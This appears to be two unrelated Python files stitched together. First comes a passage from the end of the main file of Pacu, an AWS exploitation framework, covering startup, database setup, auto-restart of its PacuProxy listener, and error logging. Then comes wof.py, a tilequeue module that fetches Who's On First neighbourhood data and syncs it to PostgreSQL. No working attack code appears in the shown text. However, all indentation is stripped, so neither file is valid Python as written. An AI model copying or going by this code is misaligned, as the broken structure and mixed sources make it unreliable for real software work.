⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⠋⣁⣤⣶⡿⣿⣿⠉⠻⠏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⢻⣿⣧⡀
⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⠋⣠⣶⣿⡟⠻⣿⠃⠈⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢹⣿⣧
⢀⣀⣤⣴⣶⣶⣶⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⠁⢠⣾⣿⠉⠻⠇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿
⠉⠛⠿⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠁⠀⠀⠀⠀⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⣿⡟
⠀⠀⠀⠀⠉⣻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣾⣿⡟⠁
⠀⠀⠀⢀⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣦⣄⡀⠀⠀⠀⠀⠀⣴⣆⢀⣴⣆⠀⣼⣆⠀⠀⣶⣶⣶⣶⣶⣶⣶⣶⣾⣿⣿⠿⠋⠀⠀
⠀⠀⠀⣼⣿⣿⣿⠿⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠓⠒⠒⠚⠛⠛⠛⠛⠛⠛⠛⠛⠀⠀⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠀⠀⠀⠀⠀
⠀⠀⠀⣿⣿⠟⠁⠀⢸⣿⣿⣿⣿⣿⣿⣿⣶⡀⠀⢠⣾⣿⣿⣿⣿⣿⣿⣷⡄⠀⢀⣾⣿⣿⣿⣿⣿⣿⣷⣆⠀⢰⣿⣿⣿⠀⠀⠀⣿⣿⣿
⠀⠀⠀⠘⠁⠀⠀⠀⢸⣿⣿⡿⠛⠛⢻⣿⣿⡇⠀⢸⣿⣿⡿⠛⠛⢿⣿⣿⡇⠀⢸⣿⣿⡿⠛⠛⢻⣿⣿⣿⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⠸⠿⠿⠟⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣧⣤⣤⣼⣿⣿⡇⠀⢸⣿⣿⣧⣤⣤⣼⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⡿⠃⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⢀⣀⣀⣀⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡏⠉⠉⠉⠉⠀⠀⠀⢸⣿⣿⡏⠉⠉⢹⣿⣿⡇⠀⢸⣿⣿⣇⣀⣀⣸⣿⣿⣿⠀⢸⣿⣿⣿⣀⣀⣀⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⠸⣿⣿⣿⣿⣿⣿⣿⣿⡿⠀⠀⢿⣿⣿⣿⣿⣿⣿⣿⡟
⠀⠀⠀⠀⠀⠀⠀⠀⠘⠛⠛⠃⠀⠀⠀⠀⠀⠀⠀⠘⠛⠛⠃⠀⠀⠘⠛⠛⠃⠀⠀⠉⠛⠛⠛⠛⠛⠛⠋⠀⠀⠀⠀⠙⠛⠛⠛⠛⠛⠉⠀
""")
except UnicodeEncodeError as error:
pass
configure_settings.copy_settings_template_into_settings_file_if_not_present()
set_sigint_handler(exit_text='\nA database must be created for Pacu to work properly.')
setup_database_if_not_present(settings.DATABASE_FILE_PATH)
set_sigint_handler(exit_text=None, value='SIGINT called')
self.database = get_database_connection(settings.DATABASE_CONNECTION_PATH)
self.server = PacuProxy()
self.proxy = ProxySettings()
self.queue = Queue()
self.check_sessions()
self.initialize_tab_completion()
self.display_pacu_help()
proxy_settings = self.get_proxy_settings()
if proxy_settings is None:
self.proxy.activate(self.database)
proxy_settings = self.get_proxy_settings()
if proxy_settings is not None and proxy_settings.listening is True:
# PacuProxy was listening on last shutdown, so restart it
self.print('Auto-starting PacuProxy listener from previous session on {}:{}...'.format(proxy_settings.ip, proxy_settings.port))
self.start_proxy()
idle_ready = True
self.check_user_agent()
self.idle()
except (Exception, SystemExit) as error:
exception_type, exception_value, tb = sys.exc_info()
if exception_type == SystemExit:
if 'SIGINT called' in exception_value.args:
print('\nBye!')
return
else:
traceback_text = '\nTraceback (most recent call last):\n{}{}: {}\n\n'.format(''.join(traceback.format_tb(tb)), str(exception_type), str(exception_value))
session, global_data, local_data = self.get_data_from_traceback(tb)
self.log_error(
traceback_text,
exception_info='{}: {}\n\nPacu caught a SystemExit error. This may be due to incorrect module arguments received by argparse in the module itself. Check to see if any required arguments are not being received by the module when it executes.'.format(exception_type, exception_value),
session=session,
local_data=local_data,
global_data=global_data
)
else:
traceback_text = '\nTraceback (most recent call last):\n{}{}: {}\n\n'.format(''.join(traceback.format_tb(tb)), str(exception_type), str(exception_value))
session, global_data, local_data = self.get_data_from_traceback(tb)
self.log_error(
traceback_text,
exception_info='{}: {}'.format(exception_type, exception_value),
session=session,
local_data=local_data,
global_data=global_data
)
if not idle_ready:
print('Pacu is unable to start. Try backing up Pacu\'s sqlite.db file and deleting the old version. If the error persists, try reinstalling Pacu in a new directory.')
return
if __name__ == '__main__':
Main().run()
|
wof.py
|
from __future__ import absolute_import
from collections import namedtuple
from contextlib import closing
from cStringIO import StringIO
from datetime import datetime
from edtf import parse_edtf
from operator import attrgetter
from psycopg2.extras import register_hstore
from shapely import geos
from tilequeue.tile import coord_marshall_int
from tilequeue.tile import coord_unmarshall_int
from tilequeue.tile import mercator_point_to_coord
from tilequeue.tile import reproject_lnglat_to_mercator
import csv
import json
import os.path
import psycopg2
import Queue
import requests
import shapely.geometry
import shapely.ops
import shapely.wkb
import threading
DATABASE_SRID = 3857
def generate_csv_lines(requests_result):
for line in requests_result.iter_lines():
if line:
yield line
neighbourhood_placetypes_to_int = dict(
neighbourhood=1,
microhood=2,
macrohood=3,
borough=4,
)
neighbourhood_int_to_placetypes = {
1: 'neighbourhood',
2: 'microhood',
3: 'macrohood',
4: 'borough',
}
NeighbourhoodMeta = namedtuple(
'NeighbourhoodMeta',
'wof_id placetype name hash label_position')
Neighbourhood = namedtuple(
'Neighbourhood',
'wof_id placetype name hash label_position geometry n_photos area '
'min_zoom max_zoom is_landuse_aoi inception cessation l10n_names '
'wikidata')
def parse_neighbourhood_meta_csv(csv_line_generator, placetype):
reader = csv.reader(csv_line_generator)
it = iter(reader)
header = it.next()
lbl_lat_idx = header.index('lbl_latitude')
lbl_lng_idx = header.index('lbl_longitude')
name_idx = header.index('name')
wof_id_idx = header.index('id')
hash_idx = header.index('file_hash')
superseded_by_idx = header.index('superseded_by')
min_row_length = (max(
lbl_lat_idx, lbl_lng_idx, name_idx, wof_id_idx, hash_idx,
superseded_by_idx) + 1)
for row in it:
if len(row) < min_row_length:
continue
superseded_by = row[superseded_by_idx]
if superseded_by:
continue
wof_id_str = row[wof_id_idx]
if not wof_id_str:
continue
try:
wof_id = int(wof_id_str)
except ValueError:
continue
name = row[name_idx]
if not name:
continue
lat_str = row[lbl_lat_idx]
lng_str = row[lbl_lng_idx]
try:
lat = float(lat_str)
lng = float(lng_str)
except ValueError:
continue
file_hash = row[hash_idx]
label_x, label_y = reproject_lnglat_to_mercator(lng, lat)
label_position = shapely.geometry.Point(label_x, label_y)
neighbourhood_meta = NeighbourhoodMeta(
wof_id, placetype, name, file_hash, label_position)
yield neighbourhood_meta
def _make_requests_session_with_retries(max_retries):
from requests.adapters import HTTPAdapter
from requests.packages.urllib3.util import Retry
s = requests.Session()
a = HTTPAdapter(
max_retries=Retry(
total=max_retries,
status_forcelist=[ # this is a list of statuses to consider to be
# an error and retry.
429, # Too many requests (i.e: back off)
500, # Generic internal server error
502, # Bad Gateway - i.e: upstream failure
503, # Unavailable, temporarily
504, # Gateway timeout
522 # Origin connection timed out
],
backoff_factor=1.0 # back off for 0s, 1s, 3s, 7s, etc... after
# each successive failure. (factor*(2^N-1))
))
# use retry for both HTTP and HTTPS connections.
s.mount('http://', a)
s.mount('https://', a)
return s
def fetch_wof_url_meta_neighbourhoods(url, placetype, max_retries):
s = _make_requests_session_with_retries(max_retries)
r = s.get(url, stream=True)
assert r.status_code == 200, 'Failure requesting: %s' % url
csv_line_generator = generate_csv_lines(r)
return parse_neighbourhood_meta_csv(csv_line_generator, placetype)
class NeighbourhoodFailure(object):
def __init__(self, wof_id, reason, message, halt=False, skipped=False,
funky=False, superseded=False):
# halt is a signal that threads should stop fetching. This
# would happen during a network IO error or when we get an
# unexpected http response when fetching raw json files. In
# some scenarios this could be recoverable, but because that
# isn't always the case we assume that we should stop further
# requests for more raw json files, and just process what we
# have so far.
# skipped means that we won't log this failure, ie there was
# an earlier "halt" error and processing of further records
# has stopped.
# funky is a signal downstream that this is a "soft" or
# expected failure, in the sense that it only means that we
# should skip the record, but we didn't actually detect any
# errors with the processing
# superseded is set when the json has a value for
# wof:superseded. This would indicate a data inconsistency
# because the meta csv file didn't have it set if we're trying
# to fetch the raw json in the first place. But this is meant
# to catch this scenario.
self.wof_id = wof_id
self.reason = reason
self.message = message
self.halt = halt
self.skipped = skipped
self.funky = funky
self.superseded = superseded
# keep this as a constant - it actually take a significant amount of time to
# re-parse this every time, when we know it's a constant.
MOST_UNKNOWN_EDTF = parse_edtf('uuuu')
# given a string, parse it as EDTF while allowing a single 'u', four u's
# 'uuuu', or None to mean completely unknown, and return the EDTF object.
def _normalize_edtf(s):
if s and s != 'u' and s != 'uuuu':
try:
return parse_edtf(s)
except Exception:
pass
# when all else fails, return the "most unknown" EDTF.
return MOST_UNKNOWN_EDTF
def create_neighbourhood_from_json(json_data, neighbourhood_meta):
def failure(reason):
return NeighbourhoodFailure(
neighbourhood_meta.wof_id, reason, json.dumps(json_data))
if not isinstance(json_data, dict):
return failure('Unexpected json')
props = json_data.get('properties')
if props is None or not isinstance(props, dict):
return failure('Missing properties')
superseded_by = props.get('wof:superseded_by')
# these often show up as empty lists, so we do a truthy test
# instead of expicitly checking for None
if superseded_by:
return NeighbourhoodFailure(
neighbourhood_meta.wof_id,
'superseded_by: %s' % superseded_by,
json.dumps(json_data), superseded=True)
geometry = json_data.get('geometry')
if geometry is None:
return failure('Missing geometry')
try:
shape_lnglat = shapely.geometry.shape(geometry)
except Exception:
return failure('Unexpected geometry')
shape_mercator = shapely.ops.transform(
reproject_lnglat_to_mercator, shape_lnglat)
# ignore any features that are marked as funky
is_funky = props.get('mz:is_funky')
if is_funky is not None:
try:
is_funky = int(is_funky)
except ValueError:
return failure('Unexpected mz:is_funky value %s' % is_funky)
if is_funky != 0:
return NeighbourhoodFailure(
neighbourhood_meta.wof_id,
'mz:is_funky value is not 0: %s' % is_funky,
json.dumps(json_data), funky=True)
wof_id = props.get('wof:id')
if wof_id is None:
return failure('Missing wof:id')
try:
wof_id = int(wof_id)
except ValueError:
return failure('wof_id is not an int: %s' % wof_id)
name = props.get('wof:name')
if name is None:
return failure('Missing name')
n_photos = props.get('misc:photo_sum')
if n_photos is not None:
try:
n_photos = int(n_photos)
except ValueError:
return failure('misc:photo_sum is not an int: %s' % n_photos)
label_lat = props.get('lbl:latitude')
label_lng = props.get('lbl:longitude')
if label_lat is None or label_lng is None:
# first, try to fall back to geom:* when lbl:* is missing. we'd prefer
# to have lbl:*, but it's better to have _something_ than nothing.
label_lat = props.get('geom:latitude')
label_lng = props.get('geom:longitude')
if label_lat is None or label_lng is None:
return failure('Missing lbl:latitude or lbl:longitude and ' +
'geom:latitude or geom:longitude')
try:
label_lat = float(label_lat)
label_lng = float(label_lng)
except ValueError:
return failure('lbl:latitude or lbl:longitude not float')
label_merc_x, label_merc_y = reproject_lnglat_to_mercator(
label_lng, label_lat)
label_position = shapely.geometry.Point(label_merc_x, label_merc_y)
placetype = props.get('wof:placetype')
if placetype is None:
return failure('Missing wof:placetype')
default_min_zoom = 15
default_max_zoom = 16
min_zoom = props.get('mz:min_zoom')
if min_zoom is None:
min_zoom = default_min_zoom
else:
try:
min_zoom = float(min_zoom)
except ValueError:
return failure('mz:min_zoom not float: %s' % min_zoom)
max_zoom = props.get('mz:max_zoom')
if max_zoom is None:
max_zoom = default_max_zoom
else:
try:
max_zoom = float(max_zoom)
except ValueError:
return failure('mz:max_zoom not float: %s' % max_zoom)
is_landuse_aoi = props.get('mz:is_landuse_aoi')
if is_landuse_aoi is not None:
try:
is_landuse_aoi = int(is_landuse_aoi)
except ValueError:
return failure('is_landuse_aoi not int: %s' % is_landuse_aoi)
is_landuse_aoi = is_landuse_aoi != 0
if shape_mercator.type in ('Polygon', 'MultiPolygon'):
area = int(shape_mercator.area)
else:
area = None
# for the purposes of display, we only care about the times when something
# should first start to be shown, and the time when it should stop
# showing.
edtf_inception = _normalize_edtf(props.get('edtf:inception'))
edtf_cessation = _normalize_edtf(props.get('edtf:cessation'))
edtf_deprecated = _normalize_edtf(props.get('edtf:deprecated'))
# check that the dates are valid first to return back a better error
inception_earliest = edtf_inception.lower_fuzzy()
cessation_latest = edtf_cessation.upper_fuzzy()
deprecated_latest = edtf_deprecated.upper_fuzzy()
if inception_earliest is None:
return failure('invalid edtf:inception: %s' %
props.get('edtf:inception'))
if cessation_latest is None:
return failure('invalid edtf:cessation: %s' %
props.get('edtf:cessation'))
if deprecated_latest is None:
return failure('invalid edtf:deprecated: %s' %
props.get('edtf:deprecated'))
# the 'edtf:inception' property gives us approximately the former and we
# take the earliest date it could mean. the 'edtf:cessation' and
# 'edtf:deprecated' would both stop the item showing, so we take the
# earliest of each's latest possible date.
inception = inception_earliest
cessation = min(cessation_latest, deprecated_latest)
# grab any names in other languages
lang_suffix_size = len('_preferred')
l10n_names = {}
for k, v in props.iteritems():
if not v:
continue
if not k.startswith('name:') or not k.endswith('_preferred'):
continue
if isinstance(v, list):
v = v[0]
lang = k[:-lang_suffix_size]
l10n_names[lang] = v
if not l10n_names:
l10n_names = None
wikidata = None
# get wikidata ID concordance, if there is one
concordances = props.get('wof:concordances')
if concordances:
wikidata = concordances.get('wd:id')
neighbourhood = Neighbourhood(
wof_id, placetype, name, neighbourhood_meta.hash, label_position,
shape_mercator, n_photos, area, min_zoom, max_zoom, is_landuse_aoi,
inception, cessation, l10n_names, wikidata)
return neighbourhood
def fetch_url_raw_neighbourhood(url, neighbourhood_meta, max_retries):
try:
s = _make_requests_session_with_retries(max_retries)
r = s.get(url)
except Exception, e:
# if there is an IO error when fetching the url itself, we'll
# want to halt too
return NeighbourhoodFailure(
neighbourhood_meta.wof_id, 'IO Error fetching %s' % url, str(e),
halt=True)
if r.status_code != 200:
# once we don't get a 200, signal that we should stop all
# remaining processing
return NeighbourhoodFailure(
neighbourhood_meta.wof_id,
'Invalid response %d for %s' % (r.status_code, url), r.text,
halt=True)
try:
doc = r.json()
except Exception, e:
return NeighbourhoodFailure(
neighbourhood_meta.wof_id, 'Response is not json for %s' % url,
r.text)
try:
neighbourhood = create_neighbourhood_from_json(doc, neighbourhood_meta)
except Exception, e:
return NeighbourhoodFailure(
neighbourhood_meta.wof_id,
'Unexpected exception parsing json',
json.dumps(doc))
return neighbourhood
def fetch_fs_raw_neighbourhood(path, neighbourhood_meta):
with open(path) as fp:
json_data = json.load(fp)
neighbourhood = create_neighbourhood_from_json(json_data,
neighbourhood_meta)
return neighbourhood
def generate_wof_url(url_prefix, wof_id):
wof_id_str = str(wof_id)
grouped = []
grouping = []
for c in wof_id_str:
grouping.append(c)
if len(grouping) == 3:
grouped.append(grouping)
grouping = []
if grouping:
grouped.append(grouping)
grouped_part = '/'.join([''.join(part) for part in grouped])
wof_url = '%s/%s/%s.geojson' % (url_prefix, grouped_part, wof_id_str)
return wof_url
def make_fetch_raw_url_fn(data_url_prefix, max_retries):
def fn(neighbourhood_meta):
wof_url = generate_wof_url(
data_url_prefix, neighbourhood_meta.wof_id)
neighbourhood = fetch_url_raw_neighbourhood(wof_url,
neighbourhood_meta,
max_retries)
return neighbourhood
return fn
def make_fetch_raw_filesystem_fn(data_path):
def fn(neighbourhood_meta):
# this will work for OS's with / separators
wof_path = generate_wof_url(
data_path, neighbourhood_meta.wof_id)
neighbourhood = fetch_fs_raw_neighbourhood(wof_path,
neighbourhood_meta)
return neighbourhood
return fn
def threaded_fetch(neighbourhood_metas, n_threads, fetch_raw_fn):
queue_size = n_threads * 10
neighbourhood_input_queue = Queue.Queue(queue_size)
neighbourhood_output_queue = Queue.Queue(len(neighbourhood_metas))
stop = threading.Event()
def _fetch_raw_neighbourhood():
while True:
neighbourhood_meta = neighbourhood_input_queue.get()
if neighbourhood_meta is None:
break
if stop.is_set():
# assume all remaining neighbourhoods are failures
# these will get skipped
neighbourhood_output_queue.put(NeighbourhoodFailure(
neighbourhood_meta.wof_id,
'Skipping remaining neighbourhoods',
'Skipping remaining neighbourhoods',
skipped=True))
continue
neighbourhood = fetch_raw_fn(neighbourhood_meta)
if isinstance(neighbourhood, NeighbourhoodFailure):
failure = neighbourhood
# if this is the type of error that should stop all
# processing, notify all other threads
if failure.halt:
stop.set()
neighbourhood_output_queue.put(neighbourhood)
fetch_threads = []
for i in xrange(n_threads):
fetch_thread = threading.Thread(target=_fetch_raw_neighbourhood)
fetch_thread.start()
fetch_threads.append(fetch_thread)
for neighbourhood_meta in neighbourhood_metas:
neighbourhood_input_queue.put(neighbourhood_meta)
for fetch_thread in fetch_threads:
neighbourhood_input_queue.put(None)
neighbourhoods = []
failures = []
for i in xrange(len(neighbourhood_metas)):
neighbourhood = neighbourhood_output_queue.get()
if isinstance(neighbourhood, NeighbourhoodFailure):
failures.append(neighbourhood)
else:
neighbourhoods.append(neighbourhood)
for fetch_thread in fetch_threads:
fetch_thread.join()
return neighbourhoods, failures
class WofUrlNeighbourhoodFetcher(object):
def __init__(self, neighbourhood_url, microhood_url, macrohood_url,
borough_url, data_url_prefix, n_threads, max_retries):
self.neighbourhood_url = neighbourhood_url
self.microhood_url = microhood_url
self.macrohood_url = macrohood_url
self.borough_url = borough_url
self.data_url_prefix = data_url_prefix
self.n_threads = n_threads
self.max_retries = max_retries
def fetch_meta_neighbourhoods(self):
return fetch_wof_url_meta_neighbourhoods(
self.neighbourhood_url, 'neighbourhood', self.max_retries)
def fetch_meta_microhoods(self):
return fetch_wof_url_meta_neighbourhoods(
self.microhood_url, 'microhood', self.max_retries)
def fetch_meta_macrohoods(self):
return fetch_wof_url_meta_neighbourhoods(
self.macrohood_url, 'macrohood', self.max_retries)
def fetch_meta_boroughs(self):
return fetch_wof_url_meta_neighbourhoods(
self.borough_url, 'borough', self.max_retries)
def fetch_raw_neighbourhoods(self, neighbourhood_metas):
url_fetch_fn = make_fetch_raw_url_fn(self.data_url_prefix,
self.max_retries)
neighbourhoods, failures = threaded_fetch(
neighbourhood_metas, self.n_threads, url_fetch_fn)
return neighbourhoods, failures
class WofFilesystemNeighbourhoodFetcher(object):
def __init__(self, wof_data_path, n_threads):
self.wof_data_path = wof_data_path
self.n_threads = n_threads
def _fetch_meta_neighbourhoods(self, placetype):
meta_fs_path = os.path.join(
self.wof_data_path, 'meta', 'wof-%s-latest.csv' % placetype)
with open(meta_fs_path) as fp:
meta_neighbourhoods = list(
parse_neighbourhood_meta_csv(fp, placetype))
return meta_neighbourhoods
def fetch_meta_neighbourhoods(self):
return self._fetch_meta_neighbourhoods('neighbourhood')
def fetch_meta_microhoods(self):
return self._fetch_meta_neighbourhoods('microhood')
def fetch_meta_macrohoods(self):
return self._fetch_meta_neighbourhoods('macrohood')
def fetch_meta_boroughs(self):
return self._fetch_meta_neighbourhoods('borough')
def fetch_raw_neighbourhoods(self, neighbourhood_metas):
data_prefix = os.path.join(
self.wof_data_path, 'data')
fs_fetch_fn = make_fetch_raw_filesystem_fn(data_prefix)
neighbourhoods, failures = threaded_fetch(
neighbourhood_metas, self.n_threads, fs_fetch_fn)
return neighbourhoods, failures
def create_neighbourhood_file_object(neighbourhoods, curdate=None):
buf = StringIO()
write_neighbourhood_data_to_file(buf, neighbourhoods, curdate)
buf.seek(0)
return buf
def escape_string(s):
return s.encode('utf-8').replace('\t', ' ').replace('\n', ' ')
def escape_hstore_string(s):
s = escape_string(s)
if ' ' in s or ',' in s:
s = s.replace('"', '\\\\"')
s = '"%s"' % s
return s
def write_neighbourhood_data_to_file(buf, neighbourhoods, curdate=None):
if curdate is None:
curdate = datetime.now().date()
# tell shapely to include the srid when generating WKBs
geos.WKBWriter.defaults['include_srid'] = True
def write_nullable_int(buf, x):
if x is None:
buf.write('\\N\t')
else:
buf.write('%d\t' % x)
for n in neighbourhoods:
buf.write('%d\t' % n.wof_id)
buf.write('%d\t' % neighbourhood_placetypes_to_int[n.placetype])
buf.write('%s\t' % escape_string(n.name))
buf.write('%s\t' % escape_string(n.hash))
write_nullable_int(buf, n.n_photos)
write_nullable_int(buf, n.area)
buf.write('%d\t' % n.min_zoom)
buf.write('%d\t' % n.max_zoom)
if n.is_landuse_aoi is None:
buf.write('\\N\t')
else:
buf.write('%s\t' % ('true' if n.is_landuse_aoi else 'false'))
geos.lgeos.GEOSSetSRID(n.label_position._geom, DATABASE_SRID)
buf.write(n.label_position.wkb_hex)
buf.write('\t')
geos.lgeos.GEOSSetSRID(n.geometry._geom, DATABASE_SRID)
buf.write(n.geometry.wkb_hex)
buf.write('\t')
buf.write('%s\t' % n.inception.isoformat())
buf.write('%s\t' % n.cessation.isoformat())
is_visible = n.inception < curdate and n.cessation >= curdate
is_visible_str = 't' if is_visible else 'f'
buf.write('%s\t' % is_visible_str)
if n.l10n_names:
hstore_items = []
for k, v in n.l10n_names.items():
k = escape_hstore_string(k)
v = escape_hstore_string(v)
hstore_items.append("%s=>%s" % (k, v))
hstore_items_str = ','.join(hstore_items)
buf.write('%s' % hstore_items_str)
else:
buf.write('\\N')
buf.write('\t')
if n.wikidata:
buf.write(escape_string(n.wikidata))
else:
buf.write('\\N')
buf.write('\n')
class WofModel(object):
def __init__(self, postgresql_conn_info):
self.postgresql_conn_info = postgresql_conn_info
self.table = 'wof_neighbourhood'
def _create_conn(self):
conn = psycopg2.connect(**self.postgresql_conn_info)
register_hstore(conn)
conn.set_session(autocommit=False)
return conn
def find_previous_neighbourhood_meta(self):
with closing(self._create_conn()) as conn:
with conn.cursor() as cursor:
cursor.execute(
'SELECT wof_id, placetype, name, hash, '
'ST_AsBinary(label_position) '
'FROM %s ORDER BY wof_id ASC' % self.table)
ns = []
for row in cursor:
wof_id, placetype_int, name, hash, label_bytes = row
wof_id = int(wof_id)
label_bytes = bytes(label_bytes)
label_position = shapely.wkb.loads(label_bytes)
placetype = neighbourhood_int_to_placetypes[placetype_int]
n = NeighbourhoodMeta(
wof_id, placetype, name, hash, label_position)
ns.append(n)
return ns
def sync_neighbourhoods(
self, neighbourhoods_to_add, neighbourhoods_to_update,
ids_to_remove):
geos.WKBWriter.defaults['include_srid'] = True
def gen_data(n):
geos.lgeos.GEOSSetSRID(n.label_position._geom, DATABASE_SRID)
geos.lgeos.GEOSSetSRID(n.geometry._geom, DATABASE_SRID)
return dict(
table=self.table,
placetype=neighbourhood_placetypes_to_int[n.placetype],
name=n.name,
hash=n.hash,
n_photos=n.n_photos,
area=n.area,
min_zoom=n.min_zoom,
max_zoom=n.max_zoom,
is_landuse_aoi=n.is_landuse_aoi,
inception=n.inception,
cessation=n.cessation,
label_position=n.label_position.wkb_hex,
geometry=n.geometry.wkb_hex,
wof_id=n.wof_id,
l10n_name=n.l10n_names,
wikidata=n.wikidata,
)
if ids_to_remove:
ids_to_remove_str = ', '.join(map(str, ids_to_remove))
if neighbourhoods_to_update:
update_data = map(gen_data, neighbourhoods_to_update)
if neighbourhoods_to_add:
insert_data = map(gen_data, neighbourhoods_to_add)
# this closes the connection
with closing(self._create_conn()) as conn:
# this commits the transaction
with conn as conn:
# this frees any resources associated with the cursor
with conn.cursor() as cursor:
if ids_to_remove:
cursor.execute(
'DELETE FROM %s WHERE wof_id IN (%s)' %
(self.table, ids_to_remove_str))
if neighbourhoods_to_update:
cursor.executemany(
'UPDATE ' + self.table + ' SET '
'placetype=%(placetype)s, '
'name=%(name)s, '
'hash=%(hash)s, '
'n_photos=%(n_photos)s, '
'area=%(area)s, '
'min_zoom=%(min_zoom)s, '
'max_zoom=%(max_zoom)s, '
'is_landuse_aoi=%(is_landuse_aoi)s, '
'inception=%(inception)s, '
'cessation=%(cessation)s, '
'label_position=%(label_position)s, '
'l10n_name=%(l10n_name)s, '
'wikidata=%(wikidata)s, '
'geometry=%(geometry)s '
'WHERE wof_id=%(wof_id)s',
update_data)
if neighbourhoods_to_add:
cursor.executemany(
'INSERT INTO ' + self.table + ' '
'(wof_id, placetype, name, hash, n_photos, area, '
'min_zoom, max_zoom, is_landuse_aoi, '
'inception, cessation, '
'label_position, geometry, l10n_name, wikidata) '
'VALUES (%(wof_id)s, %(placetype)s, %(name)s, '
'%(hash)s, %(n_photos)s, %(area)s, %(min_zoom)s, '
'%(max_zoom)s, %(is_landuse_aoi)s, '
'%(inception)s, %(cessation)s, '
'%(label_position)s, %(geometry)s, %(l10n_name)s, '
'%(wikidata)s)',
insert_data)
def insert_neighbourhoods(self, neighbourhoods):
# create this whole input file like object outside of the transaction
nf = create_neighbourhood_file_object(neighbourhoods)
# close the connection
with closing(self._create_conn()) as conn:
# commit the transaction
with conn as conn:
with conn.cursor() as cursor:
cursor.copy_from(nf, self.table)
# update the whole table so that the `is_visible` flag is accurate for the
# `current_date`. this returns a list of coords at `zoom` which have
# changed visibility from true to false or vice-versa.
def update_visible_timestamp(self, zoom, current_date):
coords = set()
def coord_int(row):
x, y = row
return coord_int_at_mercator_point(zoom, x, y)
# close the connection
with closing(self._create_conn()) as conn:
# commit the transaction
with conn as conn:
with conn.cursor() as cursor:
# select the x, y position of the label for each WOF
# neighbourhood that changed visibility when the date
# was updated to `current_date`.
cursor.execute(
'SELECT st_x(n.label_position) as x, '
' st_y(n.label_position) as y '
'FROM ('
' SELECT wof_update_visible_ids(%s::date) AS id '
') u '
'JOIN wof_neighbourhood n '
'ON n.wof_id = u.id',
(current_date.isoformat(),))
for result in cursor:
coords.add(coord_int(result))
return coords
def diff_neighbourhoods(xs, ys):
# NOTE this requires that both xs and ys be sequences of
# neighbourhoods, sorted by wof_id in ascending order
# returns a sequence of tuples:
# (None, x) -> neighbourhoods that have been added
# (x, None) -> neighbourhoods that have been removed
# (x, y) -> neighbourhoods that have been updated
diffs = []
n_xs = len(xs)
n_ys = len(ys)
idx_xs = 0
idx_ys = 0
# iterate through both lists while we still have values for both
while idx_xs < n_xs and idx_ys < n_ys:
x = xs[idx_xs]
y = ys[idx_ys]
if x.wof_id < y.wof_id:
diffs.append((x, None))
idx_xs += 1
continue
if y.wof_id < x.wof_id:
diffs.append((None, y))
idx_ys += 1
continue
if x.hash != y.hash:
# if there are any differences the hash will be different
diffs.append((x, y))
idx_xs += 1
idx_ys += 1
# catch any differences
while idx_xs < n_xs:
x = xs[idx_xs]
diffs.append((x, None))
idx_xs += 1
while idx_ys < n_ys:
y = ys[idx_ys]
diffs.append((None, y))
idx_ys += 1
return diffs
def coord_int_at_mercator_point(z, x, y):
coord = mercator_point_to_coord(z, x, y)
coord_int = coord_marshall_int(coord)
return coord_int
def generate_tile_expiry_list(zoom, diffs):
coord_ints = set()
def add_neighbourhood_diff(n):
if n is not None:
x = n.label_position.x
y = n.label_position.y
coord_int = coord_int_at_mercator_point(zoom, x, y)
coord_ints.add(coord_int)
for n1, n2 in diffs:
# for our purposes, we will expire any kind of modification,
# whether the neighbourhoods were added, removed, or updated
add_neighbourhood_diff(n1)
add_neighbourhood_diff(n2)
return coord_ints
def log_failure(logger, failure):
if not (failure.skipped or failure.funky or failure.superseded):
failure_message_one_line = failure.message.replace('\n', ' | ')
logger.error('Neighbourhood failure for %d: %r - %r' % (
failure.wof_id, failure.reason, failure_message_one_line))
class WofProcessor(object):
def __init__(self, fetcher, model, redis_cache_index, intersector,
rawr_enqueuer, logger, current_date):
self.fetcher = fetcher
self.model = model
self.redis_cache_index = redis_cache_index
self.intersector = intersector
self.rawr_enqueuer = rawr_enqueuer
self.logger = logger
self.zoom_expiry = 16
